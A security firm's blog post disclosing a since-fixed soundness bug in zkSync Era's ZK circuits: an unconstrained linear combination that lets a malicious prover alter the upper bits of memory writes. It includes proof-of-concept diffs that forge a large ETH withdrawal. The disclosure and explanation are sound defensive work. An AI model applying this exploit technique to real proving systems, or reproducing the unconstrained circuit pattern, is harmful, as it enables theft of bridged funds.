Patch Thursday — Uncovering a ZK-EVM Soundness Bug in zkSync Era
ChainLight researchers identified a soundness bug in the ZK-circuits for the zkSync Era mainnet on September 15th and promptly reported the issue on the 19th. The bug allowed a malicious prover to produce “proofs” for invalidly executed blocks, which the verifier smart contracts on L1 would have accepted. Matter Labs has deployed a fix for the issue and awarded ChainLight a 50K USDC reward for disclosing the issue, the first bounty to be claimed for a ZK-circuit bug in zkSync Era.
This post will detail how we discovered the issue and explain how our proof-of-concept exploit works.
Background
To help readers understand the nature of this bug, we provide the following background information:
- Validity Proofs
- Zero-Knowledge Rollups (ZK-Rollups and Validiums)
- ZK-EVM
- Structure of zkSync Era
Validity Proofs
Validity proofs refer to a broad class of cryptographic tools which enable verifiable computation. By verifiable computation, we mean that one party (the prover) can perform some expensive computation, such as executing a bunch of transactions on a blockchain, and produce a proof that the computation was done correctly. This proof must be relatively small (compared to the amount of computation it proves) and must be computationally cheap to verify.
In practice today, most validity proof systems use ZK-STARKs or ZK-SNARKs, so validity proofs are sometimes called “ZK-proofs.” In these systems, the correctness of the computation is enforced by constraints derived from a “ZK-circuit,” which describes the computation. It is critical that these circuits correctly constrain the inputs and outputs according to the computation rules, or else a malicious prover could produce “proofs” for invalid computation, known as a soundness error.
ZK-Rollups and Validiums
Verifiable computation is a fundamental tool for scaling blockchain applications. Typically, any computation performed on a blockchain is repeated by each node in the network. This model inherently leads to a trade-off between decentralization and scalability because mass decentralization can only be achieved if the hardware requirements to run a node are reasonably low. Verifiable computation solves this issue by introducing asymmetric requirements: only one party performs the expensive computation, but all other participants can cheaply verify the correctness.
While validity proofs may one day be used to scale blockchains such as Ethereum directly, they are currently primarily used to create second-layer (L2) blockchains that settle to an existing (L1) blockchain.
L2 blockchains using validity proofs perform the following two roles using smart contracts:
- Store their state roots on the L1 blockchain.
- Verify proof of validity corresponding to the state root to ensure correct execution of blocks.
Without delving extensively into the terminology debate, L2s using ZK-based validity proofs are called either “ZK-rollups” or “Validiums.”
ZK-EVMs
In general, ZK-EVM refers to any execution environment modeled “closely” after the EVM which can be validity proven. Various types of ZK-EVMs exist with different similarities to the Ethereum standard. The gold standard is a type-1 ZK-EVM, which could be used to natively scale the Ethereum base layer, but many ZK-EVMs make adjustments in order to increase proving efficiency.
ZK-rollups or Validiums that settle to Ethereum are not required to be based on ZK-EVMs, but the amount of EVM-based tooling and developers makes it an attractive option.
zkSync Era
zkSync Era is a ZK-powered scaling solution for Ethereum, which is currently the most used L2 with a transaction volume rivaling Ethereum itself. Thus, it is one of the most critical pieces of infrastructure in the crypto space. zkSync Era was created by the team at Matter Labs. As one of the core contributors to the protocol, they have stated since inception that security is “the most critical aspect of launching zkSync Era to the public,” which is supported by their multi-layered security approach. While using multiple security layers is common practice amongst L2s, they are sometimes called “training wheels” by the community because they are seen as a temporary measure needed only in these early stages. In fact, for most of these L2s to meet their decentralization goals, some of these layers must be removed or significantly adapted. For instance, all governance roles currently controlled by an internal multi-sig must (at minimum) be placed behind an appropriately long timelock and allow users to exit before the action.
As the training wheels get removed, the correctness of the validity proof scheme becomes paramount. Below, we’ll give an overview of how this system works. For further details, we suggest checking out the Code4rena zkSync Era audit docs.
EraVM
zkSync Era’s execution environment is a type-4 ZK-EVM, which supports the same high-level languages as the EVM, such as Solidity, Yul, and Vyper, but compiles to a custom instruction set. The EraVM is somewhat similar to the EVM but has some significant differences. To name a few:
- The EraVM is register-based, while the EVM is stack-based. In some cases, the EraVM still uses a stack as temporary storage, like when it runs out of registers, but most opcodes will take register operands.
- The EraVM has two heaps (the heap and the aux heap), which can be used for temporary memory and to pass data between contracts. In order to emulate
calldata
andreturndata
semantics from the EVM, the EraVM explicitly tracks whether each 256-bit value is a pointer into another heap, which is called a “fat pointer”, and enforces rules for how fat pointers can be passed between contracts. - Inter-contract calls do not have a
value
. Thus, they can not transfer ETH directly.
In order to more closely match the EVM semantics, the EraVM uses a set of “system contracts” that run in “kernel mode” and have permission to execute privileged instructions. For example, since calls cannot natively transfer ETH, ETH balance tracking and transferring are instead handled by a system contract called L2EthToken
. To perform a call that also transfers ETH, you instead call the MsgValueSimulator
system contract, which uses its kernel privileges to perform the ETH transfer and then execute a “mimic” call, giving the callee the appearance that it was called directly.
The zkSync Era software stack uses multiple implementations of the EraVM:
- The
zk_evm
repo: an out-of-circuit implementation used by the sequencer and any other nodes. The prover also uses this implementation to create a detailed execution trace, which is used as “witness” data for the circuits. - The
sync_vm
repo: a ZK-circuit implementation, which produces the actual constraints that get proven and verified on Ethereum.
EraVM ZK-Circuits
The EraVM circuits are quite complex but are the core technology behind the entire network. Due to the complexity, we will only touch on a few parts of the circuits that are relevant to the identified soundness issue; for more details, check out these docs.
Since any ZK-circuit produces a fixed number of constraints, proving arbitrary amounts of computation requires recursive circuits that verify proofs of other circuits. Additionally, the responsibilities are divided between many circuits, constraining different parts of the computation. Ultimately, all of the proofs get aggregated into a single proof, verified by a smart contract on Ethereum.
For our purposes, we’ll focus on these two circuits:
- Main VM: Constrains the sequence of instructions executed, the inputs and outputs of basic instructions such as arithmetics, and produces a queue of partially-constrained results to be further constrained by other circuits.
- RAM Permutation: Validates that the “memory queue” (list of memory operations) produced by the Main VM circuit (and other circuits that access memory) is self-consistent.
Memory Queue
Based on the two circuits highlighted above, the issue is likely related to memory operations. So it is worth first spending more time on how memory reads and writes get constrained.
Since memory can be written by operations handled in other circuits, such as code de-commitment and Keccak hashing, the main VM circuit cannot constrain memory reads on its own. Instead, any time it reads or writes a value to or from memory, it appends the operation to the memory queue.
The memory queue commits to a sequence of MemoryQuery
objects, which specify 4 things:
- when the access occurred (relative to other instructions)
- which memory was accessed
- whether it was read or written
- what value was read or written
pub struct MemoryQuery<E: Engine> {
pub timestamp: UInt32<E>,
pub memory_page: UInt32<E>,
pub memory_index: UInt32<E>,
pub rw_flag: Boolean,
pub value: UInt256<E>,
pub value_is_ptr: Boolean,
}
Using the queue, the Main VM circuit can handle “store” (memory write) instructions by constraining that the source register value is placed into a “write” MemoryQuery
(with the destination memory location) and appended to the queue. Handling reads is more complicated because the Main VM circuit cannot know on its own what value should exist at a given address (because other circuits can edit memory). Therefore, in order to handle reads, the circuit can load a witness value into the register and append a “read” MemoryQuery
to the queue with the claimed value.
After all memory operations are committed to by the various circuits, the RAM Permutation circuit checks their consistency. This circuit takes two memory queues as input:
- The committed queue from the Main VM circuits (and other memory-accessing circuits).
- A witness “sorted” queue is constrained to contain the same set of
MemoryQuery
objects but must be sorted by(memory_page, memory_index, timestamp)
.
By sorting the accesses this way, the RAM Permutation circuit can check memory consistency by iterating the queue once and comparing adjacent elements.
In pseudocode:
if (prev.memory_page, prev.memory_index) == (cur.memory_page, cur.memory_index) {
// if cur accesses the same location as the previous, it must either be a write
// OR have the same value as the previous access
assert!(cur.rw_flag || cur.value == prev.value);
} else {
// if cur accesses a new location, it must either be a write OR read the zero value
assert!(cur.rw_flag || cur.value == 0);
}
Of course, the actual code producing these constraints is nontrivial. For example, checking that the committed and sorted queues contain the same elements is done using a permutation argument, a common trick used in ZK-proofs.
Bug Details
We’ve now covered enough background to get into the bug. As is often the case, the devil is in the implementation details.
The first important implementation detail is that the above MemoryQuery
struct is actually a slightly simplified version of what the queue contains. These MemoryQuery
structs get converted into RawMemoryQuery
form:
pub struct RawMemoryQuery<E: Engine> {
pub timestamp: UInt32<E>,
pub memory_page: UInt32<E>,
pub memory_index: UInt32<E>,
pub rw_flag: Boolean,
pub value_residual: UInt64<E>,
pub value: Num<E>,
pub value_is_ptr: Boolean,
}
Notice the difference: the value field used to be a UInt256<E>
, but now has been split into two fields with types Num<E>
and UInt64<E>
. This conversion is because the curve used in the circuits (bn254) can only reliably store 253 bits in a single field element. In fact, the UInt256<E>
type internally stores the value as 4 Uint64<E>
values, each in their own Num<E>
. In a RawMemoryQuery
, the value field stores the lower 192 bits of the value, while the value_residual
field stores the upper 64 bits. For efficiency reasons, the RawMemoryQuery
ultimately gets encoded as 2 Num<E>
values before being appended to the queue:
impl<E: Engine> RawMemoryQuery<E> {
pub fn pack<CS: ConstraintSystem<E>>(
&self,
cs: &mut CS,
) -> Result<[Num<E>; 2], SynthesisError> {
let shifts = compute_shifts::<E::Fr>();
let el0 = self.value;
let mut shift = 0;
let mut lc = LinearCombination::zero();
lc.add_assign_number_with_coeff(&self.value_residual.inner, shifts[shift]);
shift += 64;
// NOTE: we pack is as it would be compatible with PackedMemoryQuery later on
lc.add_assign_number_with_coeff(&self.memory_index.inner, shifts[shift]);
shift += 32;
lc.add_assign_number_with_coeff(&self.memory_page.inner, shifts[shift]);
shift += 32;
// ------------
lc.add_assign_number_with_coeff(&self.timestamp.inner, shifts[shift]);
shift += 32;
lc.add_assign_boolean_with_coeff(&self.rw_flag, shifts[shift]);
shift += 1;
lc.add_assign_boolean_with_coeff(&self.value_is_ptr, shifts[shift]);
shift += 1;
assert!(shift <= E::Fr::CAPACITY as usize);
let el1 = lc.into_num(cs)?;
// dbg!(el0.get_value());
// dbg!(el1.get_value());
Ok([el0, el1])
}
}
Here is how to understand what is happening in the above code:
cs
references theConstraintSystem
, which is passed around through the entire circuit code to accumulate constraints. Generally speaking, a function is expected to produce constraints if and only if it takes cs as an argument.pack
returns[el0, el1]
, whereel0
is taken fromself.value
, andel1
is constructed by packing the remaining elements into a singleNum<E>
(explained below).compute_shifts::<E::Fr>()
simply computes all values of(1 << i)
for0 <= i <= 253
as constant field elements. This is just a convenience function that doesn’t produce any circuit constraints on its own.el1
is constructed by using aLinearCombination
, which computes expressions of the forma_0 v_0 + a_1 v_1 + … + a_n v_n
wherea_i
are constant field elements and thev_i
are circuit variables. The shifts are used to pack theRawMemoryQuery
fields into non-overlapping regions of the 253-bit value. The result of the linear combination is stored in a new variable by callinglc.into_num(cs)
.
The above code to pack the RawMemoryQuery
into two field elements looks sound, so let us now look at how the RawMemoryQuery
was first constructed. When handling a memory write instruction, it constructs a MemoryWriteQuery
and converts it to a RawMemoryQuery
:
let MemoryLocation { page, index } = mem_loc;
let memory_key = MemoryKey {
timestamp: mem_timestamp_write,
memory_page: page,
memory_index: index,
};
let write_query = MemoryWriteQuery::from_key_and_value_witness(cs, memory_key, value)?;
...
let raw_query = write_query.into_raw_query(cs)?;
...
So, how does the MemoryWriteQuery
work? In the above code, value is a Register<E>
, which stores a 256-bit value as two UInt128<E>
s:
pub struct Register<E: Engine> {
pub inner: [UInt128<E>; 2],
pub is_ptr: Boolean,
}
When constructing the MemoryWriteQuery
, this register value gets further split into 3 values (lowest_128, u64_word_2, u64_word_3)
using another LinearCombination
:
pub(crate) fn from_key_and_value_witness<CS: ConstraintSystem<E>>(
cs: &mut CS,
key: MemoryKey<E>,
register_output: Register<E>,
) -> Result<Self, SynthesisError> {
let [lowest_128, highest_128] = register_output.inner;
let tmp = highest_128
.get_value()
.map(|el| (el as u64, (el >> 64) as u64));
let (u64_word_2, u64_word_3) = match tmp {
Some((a, b)) => (Some(a), Some(b)),
_ => (None, None),
};
let u64_word_2 = UInt64::allocate_unchecked(cs, u64_word_2)?;
let u64_word_3 = UInt64::allocate(cs, u64_word_3)?;
let shifts = compute_shifts::<E::Fr>();
let mut minus_one = E::Fr::one();
minus_one.negate();
let mut lc = LinearCombination::zero();
lc.add_assign_number_with_coeff(&u64_word_2.inner, shifts[0]);
lc.add_assign_number_with_coeff(&u64_word_3.inner, shifts[64]);
lc.add_assign_number_with_coeff(&highest_128.inner, minus_one);
let MemoryKey {
timestamp,
memory_page,
memory_index,
} = key;
let new = Self {
timestamp,
memory_page,
memory_index,
lowest_128,
u64_word_2,
u64_word_3,
value_is_ptr: register_output.is_ptr,
};
Ok(new)
}
MemoryWriteQuery::into_raw_query
goes on to store u64_word_3
into value_residual
, while packing lowest_128
and u64_word_2
into the value
field:
pub(crate) fn into_raw_query<CS: ConstraintSystem<E>>(
&self,
cs: &mut CS,
) -> Result<RawMemoryQuery<E>, SynthesisError> {
let shifts = compute_shifts::<E::Fr>();
let mut lc = LinearCombination::zero();
lc.add_assign_number_with_coeff(&self.lowest_128.inner, shifts[0]);
lc.add_assign_number_with_coeff(&self.u64_word_2.inner, shifts[128]);
let value = lc.into_num(cs)?;
let new = RawMemoryQuery {
timestamp: self.timestamp,
memory_page: self.memory_page,
memory_index: self.memory_index,
rw_flag: Boolean::constant(true)
value_residual: self.u64_word_3,
value,
value_is_ptr: self.value_is_ptr,
};
Ok(new)
}
So, where is the bug? It is subtle, but recall the rule-of-thumb that constraints only get produced by functions that take a cs parameter. Looking again at the from_key_and_value_witness
code:
let mut lc = LinearCombination::zero();
lc.add_assign_number_with_coeff(&u64_word_2.inner, shifts[0]);
lc.add_assign_number_with_coeff(&u64_word_3.inner, shifts[64]);
lc.add_assign_number_with_coeff(&highest_128.inner, minus_one);
Unlike the other code using LinearCombination
s, this code never actually produces any constraints from lc. Based on the coefficients, it seems the intention is to constrain the lc
value to be zero, but to produce these constraints, you must either:
- call
lc.enforce_zero(cs)
, or - call
lc.into_num(cs)
and further constrain the resulting value
As a result, the upper 128 bits in the resulting MemoryWriteQuery
are unconstrained. This means a malicious prover could place any value in these bits, and the verifier would accept the proof as valid. In a correctly constrained circuit, the bits would be constrained to be exactly equal to the bits from the Register<E>
.
Discovery Process
ChainLight is mostly known as an auditing firm, but we also developed a ZK-powered protocol for trustless historical Ethereum state access called Relic Protocol. Our ZK-circuits are based on Matter Labs’ circuit libraries, where we have previously encountered this footgun with LinearCombination
. When we began our review of the zkSync Era circuits, this was the first bug pattern we looked for.
Exploit Details
The bug allows a prover to arbitrarily change the high 128 bits of any value stored in memory (by a store instruction) without changing the validity of the proof. While this could be abused in countless ways, one particularly easy target lies in the L2EthToken
system contract.
The code to initiate an ETH withdrawal from zkSync Era back to mainnet is as follows:
/// @notice Initiate the ETH withdrawal, funds will be available to claim on L1 `finalizeEthWithdrawal` method.
/// @param _l1Receiver The address on L1 to receive the funds.
function withdraw(address _l1Receiver) external payable override {
uint256 amount = _burnMsgValue();
// Send the L2 log, a user could use it as proof of the withdrawal
bytes memory message = _getL1WithdrawMessage(_l1Receiver, amount);
L1_MESSENGER_CONTRACT.sendToL1(message);
emit Withdrawal(msg.sender, _l1Receiver, amount);
}
/// @dev Get the message to be sent to L1 to initiate a withdrawal.
function _getL1WithdrawMessage(address _to, uint256 _amount) internal pure returns (bytes memory) {
return abi.encodePacked(IMailbox.finalizeEthWithdrawal.selector, _to, _amount);
}
This method will burn the ETH passed in msg.value
before sending an L2->L1 message certifying the withdrawal. Our goal is to burn a small amount of ETH on L2 but create a withdrawal message with a much larger _amount
field. Notice that the _getL1WithdrawMessage
helper function encodes the withdrawal message into a memory bytes array. This function gets compiled to the following EraVM assembly code:
...
add @CPI0_20[0], r0, r2 // load the function selector into `r2`
ld.1 64, r1 // load the current free memory pointer into `r1`
add 32, r1, r3
st.1 r3, r2 // store function selector into memory at `r1+32`
shl.s 96, r4, r2
add 36, r1, r3
st.1 r3, r2 // store `_to` parameter into memory at `r1+36`
add 56, r1, r2
st.1 r2, r5 // store `_amount` parameter into memory at `r1+56`
add 56, r0, r2
st.1 r1, r2 // store `56` into memory at `r1` (length field)
...
Each of the st.1
instructions stores a register’s value into the heap at the given offset. While these instructions allow misaligned stores to addresses that aren’t multiples of 32, the EraVM will translate misaligned stores into 2 aligned MemoryWriteQuery
s. Hence, when storing the _amount
parameter, two aligned write queries get created:
{
memory_page: CUR_HEAP_PAGE,
memory_index: (r1 + 56) // 32,
value: (uint256(_to) << 64) | (_amount >> 192)
},
{
memory_page: CUR_HEAP_PAGE,
memory_index: (r1 + 56) // 32 + 1,
value: (_amount << 64)
}
Exploit Code
Our goal is to change the value of the second write query above to increase the amount of ether attested by the withdraw message. For this, we edit the code responsible for handling write queries in each EraVM implementation. Each edit will implement the following logic:
- Check if the
_amount
value being written matches some magic value, such as0x1371337137
or~.00002
ETH. - If so, change the high 128 bits (of the misaligned write) to make
_amount
be a huge value, such as0x152d0000133713371337
or~100K
ETH
zk_evm repo diff:
diff --git a/src/opcodes/execution/uma.rs b/src/opcodes/execution/uma.rs
index 276c02b..7d2f0d5 100644
- -- a/src/opcodes/execution/uma.rs
+++ b/src/opcodes/execution/uma.rs
@@ -371,6 +371,14 @@ impl<const N: usize, E: VmEncodingMode<N>> DecodedOpcode<N, E> {
(word_0_read_value >> (word_0_lowest_bytes * 8)) << (word_0_lowest_bytes * 8);
// add highest bytes into lowest for overwriting
new_word_0_value = new_word_0_value | (src1 >> (unalignment * 8));
+
+ // see if we're writing 0x1337133713370000000000000000
+ if new_word_0_value.0[1] == 0x133713371337 {
+ // if so, instead write 0x152d00001337133713370000000000000000
+ new_word_0_value.0[2] = 0x152d;
+ }
+
// we need low bytes of old word and place low bytes of src1 into highest
// cleanup highest bytes
let mut new_word_1_value =
sync_vm repo diff:
diff --git a/src/vm/vm_cycle/memory_view/write_query.rs b/src/vm/vm_cycle/memory_view/write_query.rs
index cbb4172..0b09ecd 100644
- -- a/src/vm/vm_cycle/memory_view/write_query.rs
+++ b/src/vm/vm_cycle/memory_view/write_query.rs
@@ -60,6 +60,11 @@ impl<E: Engine> MemoryWriteQuery<E> {
_ => (None, None),
};
+ let u64_word_2 = if let Some(0x1337133713370000000000000000_u128) = lowest_128.get_value() {
+ Some(0x152d)
+ } else {
+ u64_word_2
+ };
// we do not need to range check everything, only N-1 ut of N elements in LC
let u64_word_2 = UInt64::allocate_unchecked(cs, u64_word_2)?;
It is important to note that this change only modifies the witness value assigned to the variable and thus doesn’t change the constraints produced by the circuit.
Executing the exploit
With these code changes in the backend, a sequencer/prover can now process a withdrawal with the magic value of 0x133713371337
wei (~.00002
ETH) and output a proven batch, which attests that the recipient withdrew 0x152d0000133713371337
wei (~100K
ETH). The zkSync Era smart contracts will accept this proof, after which the attacker can drain 100K ETH from the bridge.
If you’re interested in more details, check out our PoC code.
Impact
Given the security layers in place today, it would be difficult for anybody except Matter Labs to pull off the exploit above. An attack scenario (for an outside actor) would look as follows:
- Compromise the zkSync Era backend to inject the malicious code or steal the zkSync Era validator private key.
- Execute the exploit described above.
- Wait for the 21-hour execution delay, and hope the team doesn’t freeze the protocol before withdrawing the stolen funds.
As you can see, the execution delay makes practical exploitation of this issue quite difficult today. However, the chances of pulling off such an attack increase significantly in a more decentralized future where an admin team less directly manages the protocol.
Hence, securing the ZK-circuits powering L2s is a crucial part of the long-term scaling roadmap for Ethereum. We commend the zkSync Era team for offering rewards for ZK-circuit bugs and hope that more security researchers will review these critical ZK-circuits going forward.
About ChainLight
Patch Thursday is ChainLight’s weekly report introducing and analyzing vulnerabilities discovered and reported by our award-winning security researchers. With the mission to assist security researchers and developers in collectively learning, growing, and contributing to making Web3 a safer place, we release our report every week, free of charge.
To receive the latest research and reports conducted by award-winning experts:
👉 Subscribe to our newsletter
👉 Follow @ChainLight_io
Established in 2016, ChainLight’s award-winning experts provide tailored security solutions to fortify your smart contract and help you thrive on the blockchain.